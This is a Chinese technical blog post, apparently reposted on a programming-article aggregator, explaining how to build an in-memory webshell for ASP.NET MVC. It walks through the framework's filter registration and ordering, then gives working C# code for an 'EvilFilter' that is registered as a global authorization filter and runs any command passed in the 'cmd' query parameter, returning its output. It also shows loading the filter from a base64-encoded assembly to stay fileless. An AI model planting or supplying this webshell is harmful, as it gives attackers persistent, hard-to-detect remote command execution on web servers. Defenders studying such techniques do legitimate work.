C/C++教程
Net MVC内存马
本文主要是介绍Net MVC内存马,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
Net MVC内存马
前言
在浏览论坛时候看到几篇关于Net 内存马的文章,引发我的好奇心,随手调了一下。
结构分析
安装Java内存马的思路,来跟踪NET中的Filter注册流程。
创建了一个mvc项目看到MvcApplication类中
namespace WebApplication3
{
public class MvcApplication : System.Web.HttpApplication
{
protected void Application_Start()
{
AreaRegistration.RegisterAllAreas();
FilterConfig.RegisterGlobalFilters(GlobalFilters.Filters);
RouteConfig.RegisterRoutes(RouteTable.Routes);
BundleConfig.RegisterBundles(BundleTable.Bundles);
}
}
}
在MvcApplication 中会FilterConfig加载进来。
而FilterConfig类中配置了所有需要加载的Filter。
通过GlobalFilterCollection的Add方法进行将filter对象进行添加。
namespace System.Web.Mvc
{
//
// 摘要:
// 表示一个包含所有全局筛选器的类。
public sealed class GlobalFilterCollection : IEnumerable<Filter>, IEnumerable, IFilterProvider
{
//
// 摘要:
// 初始化 System.Web.Mvc.GlobalFilterCollection 类的新实例。
public GlobalFilterCollection();
//
// 摘要:
// 获取全局筛选器集合中的筛选器数目。
//
// 返回结果:
// 全局筛选器集合中的筛选器数目。
public int Count { get; }
//
// 摘要:
// 向全局筛选器集合添加指定筛选器。
//
// 参数:
// filter:
// 筛选器。
public void Add(object filter);
//
// 摘要:
// 使用指定的筛选器运行顺序向全局筛选器集合添加指定筛选器。
//
// 参数:
// filter:
// 筛选器。
//
// order:
// 筛选器运行顺序。
public void Add(object filter, int order);
//
// 摘要:
// 从全局筛选器集合删除所有筛选器。
public void Clear();
//
// 摘要:
// 确定某筛选器是否在全局筛选器集合中。
//
// 参数:
// filter:
// 筛选器。
//
// 返回结果:
// 如果在全局筛选器集合中找到 filter,则为 true;否则为 false。
public bool Contains(object filter);
//
// 摘要:
// 返回循环访问全局筛选器集合的枚举器。
//
// 返回结果:
// 循环访问全局筛选器集合的枚举器。
public IEnumerator<Filter> GetEnumerator();
//
// 摘要:
// 删除与指定筛选器匹配的所有筛选器。
//
// 参数:
// filter:
// 要删除的筛选器。
public void Remove(object filter);
}
}
其中有2个add方法,两个参数的方法,第二个参数是设置Filter的执行优先级。
首先让我们看FilterProviders.cs,该类为Filter提供注册点
using System;
namespace System.Web.Mvc
{
// Token: 0x020000C6 RID: 198
public static class FilterProviders
{
// Token: 0x06000533 RID: 1331 RVA: 0x0000E9D4 File Offset: 0x0000CBD4
static FilterProviders()
{
FilterProviders.Providers.Add(GlobalFilters.Filters);
FilterProviders.Providers.Add(new FilterAttributeFilterProvider());
FilterProviders.Providers.Add(new ControllerInstanceFilterProvider());
}
public static FilterProviderCollection Providers { get; private set; } = new FilterProviderCollection();
}
}
FilterAttributeFilterProvider代码
namespace System.Web.Mvc
{
// Token: 0x020000C3 RID: 195
public class FilterAttributeFilterProvider : IFilterProvider
{
// Token: 0x06000520 RID: 1312 RVA: 0x0000E489 File Offset: 0x0000C689
public FilterAttributeFilterProvider() : this(true)
{
}
// Token: 0x06000521 RID: 1313 RVA: 0x0000E492 File Offset: 0x0000C692
public FilterAttributeFilterProvider(bool cacheAttributeInstances)
{
this._cacheAttributeInstances = cacheAttributeInstances;
}
// Token: 0x06000522 RID: 1314 RVA: 0x0000E4A1 File Offset: 0x0000C6A1
protected virtual IEnumerable<FilterAttribute> GetActionAttributes(ControllerContext controllerContext, ActionDescriptor actionDescriptor)
{
return actionDescriptor.GetFilterAttributes(this._cacheAttributeInstances);
}
// Token: 0x06000523 RID: 1315 RVA: 0x0000E4AF File Offset: 0x0000C6AF
protected virtual IEnumerable<FilterAttribute> GetControllerAttributes(ControllerContext controllerContext, ActionDescriptor actionDescriptor)
{
return actionDescriptor.ControllerDescriptor.GetFilterAttributes(this._cacheAttributeInstances);
}
// Token: 0x06000524 RID: 1316 RVA: 0x0000E770 File Offset: 0x0000C970
public virtual IEnumerable<Filter> GetFilters(ControllerContext controllerContext, ActionDescriptor actionDescriptor)
{
if (controllerContext.Controller != null)
{
foreach (FilterAttribute attr in this.GetControllerAttributes(controllerContext, actionDescriptor))
{
yield return new Filter(attr, FilterScope.Controller, null);
}
foreach (FilterAttribute attr2 in this.GetActionAttributes(controllerContext, actionDescriptor))
{
yield return new Filter(attr2, FilterScope.Action, null);
}
}
yield break;
}
// Token: 0x04000164 RID: 356
private readonly bool _cacheAttributeInstances;
}
}
该类中有几个方法分别获取Filter、Controller、Action等特性集合
public IEnumerable<Filter> GetFilters(ControllerContext controllerContext, ActionDescriptor actionDescriptor)
{
if (controllerContext == null)
{
throw new ArgumentNullException("controllerContext");
}
if (actionDescriptor == null)
{
throw new ArgumentNullException("actionDescriptor");
}
IFilterProvider[] combinedItems = this.CombinedItems;
List<Filter> list = new List<Filter>();
foreach (IFilterProvider filterProvider in combinedItems)
{
foreach (Filter item in filterProvider.GetFilters(controllerContext, actionDescriptor))
{
list.Add(item);
}
}
list.Sort(FilterProviderCollection._filterComparer);
if (list.Count > 1)
{
FilterProviderCollection.RemoveDuplicates(list);
}
return list;
}
遍历combinedItems值获取IFilterProvider接口实例化对象,调用list.Sort进行排序
System.Web.Mvc.FilterProviderCollection$FilterComparer类
private class FilterComparer : IComparer<Filter>
{
// Token: 0x06000531 RID: 1329 RVA: 0x0000E96C File Offset: 0x0000CB6C
public int Compare(Filter x, Filter y)
{
if (x == null && y == null)
{
return 0;
}
if (x == null)
{
return -1;
}
if (y == null)
{
return 1;
}
if (x.Order < y.Order)
{
return -1;
}
if (x.Order > y.Order)
{
return 1;
}
if (x.Scope < y.Scope)
{
return -1;
}
if (x.Scope > y.Scope)
{
return 1;
}
return 0;
}
对比2个Filter的Order值和Scope值。
可见先调用的IAuthorizationFilter.OnAuthorization
可见IAuthorizationFilter优先级要高一些
//IAuthorizationFilter调用 AuthorizationContext authContext = InvokeAuthorizationFilters(controllerContext, filterInfo.AuthorizationFilters, actionDescriptor) //IActionFilter调用 ActionExecutedContext postActionContext = InvokeActionMethodWithFilters(controllerContext, filterInfo.ActionFilters, actionDescriptor, parameters); //IResultFilter调用 InvokeActionResultWithFilters(controllerContext, filterInfo.ResultFilters, postActionContext.Result); //IExceptionFilter调用 ExceptionContext exceptionContext = InvokeExceptionFilters(controllerContext, filterInfo.ExceptionFilters, ex);
构造
与Java一直,继承IAuthorizationFilter接口,在OnAuthorization方法中构造马的内容。然后调用GlobalFilters.Filters.add方法将继承IAuthorizationFilter接口类的实例化对象也就是构造的内存马传递进去。
比较懒代码直接写到了Controller里面进行执行注入内存马。
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Web;
using System.Web.Mvc;
namespace WebApplication3.Controllers
{
public class HomeController : Controller
{
public ActionResult Index()
{
GlobalFilters.Filters.Add(new EvilFilter(), -2);
return View();
}
public class EvilFilter : IAuthorizationFilter
{
public void OnAuthorization(AuthorizationContext filterContext)
{
HttpRequestBase request = filterContext.HttpContext.Request;
HttpResponseBase response = filterContext.HttpContext.Response;
string cmd = request.QueryString["cmd"];
if (cmd != null)
{
Process process = new Process();
process.StartInfo.FileName = cmd;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.RedirectStandardError = true;
process.Start();
byte[] data = Encoding.UTF8.GetBytes(process.StandardOutput.ReadToEnd() + process.StandardError.ReadToEnd());
response.Write(System.Text.Encoding.Default.GetString(data));
}
else
{
response.Write("null");
}
}
}
}
与Java一直 NET也可以将以上EvilFilter这个恶意的Filter编译成dll,然后编码后进行加载。
System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String("Filter base64字符"));
assembly.CreateInstance(assembly.GetTypes()[0].FullName,)
但只能在mvc下使用,因为GlobalFilters和IAuthorizationFilter需要System.Web.Mvc.dll依赖,在面对Webform的情况下无法使用。
参考
ASP.NET下的内存马(1) filter内存马
聊聊新类型ASPXCSharp
Asp.net MVC源码分析--Filter种类以及调用优先级
这篇关于Net MVC内存马的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
增量更新怎么做?-icode9专业技术文章分享11-23
-
压缩包加密方案有哪些?-icode9专业技术文章分享11-23
-
用shell怎么写一个开机时自动同步远程仓库的代码?-icode9专业技术文章分享11-23
-
webman可以同步自己的仓库吗?-icode9专业技术文章分享11-23
-
在 Webman 中怎么判断是否有某命令进程正在运行?-icode9专业技术文章分享11-23
-
如何重置new Swiper?-icode9专业技术文章分享11-23
-
oss直传有什么好处?-icode9专业技术文章分享11-23
-
如何将oss直传封装成一个组件在其他页面调用时都可以使用?-icode9专业技术文章分享11-23
-
怎么使用laravel 11在代码里获取路由列表?-icode9专业技术文章分享11-23
-
怎么实现ansible playbook 备份代码中命名包含时间戳功能?-icode9专业技术文章分享11-22
-
ansible 的archive 参数是什么意思?-icode9专业技术文章分享11-22
-
ansible 中怎么只用archive 排除某个目录?-icode9专业技术文章分享11-22
-
exclude_path参数是什么作用?-icode9专业技术文章分享11-22
-
微信开放平台第三方平台什么时候调用数据预拉取和数据周期性更新接口?-icode9专业技术文章分享11-22
-
uniapp 实现聊天消息会话的列表功能怎么实现?-icode9专业技术文章分享11-22
栏目导航
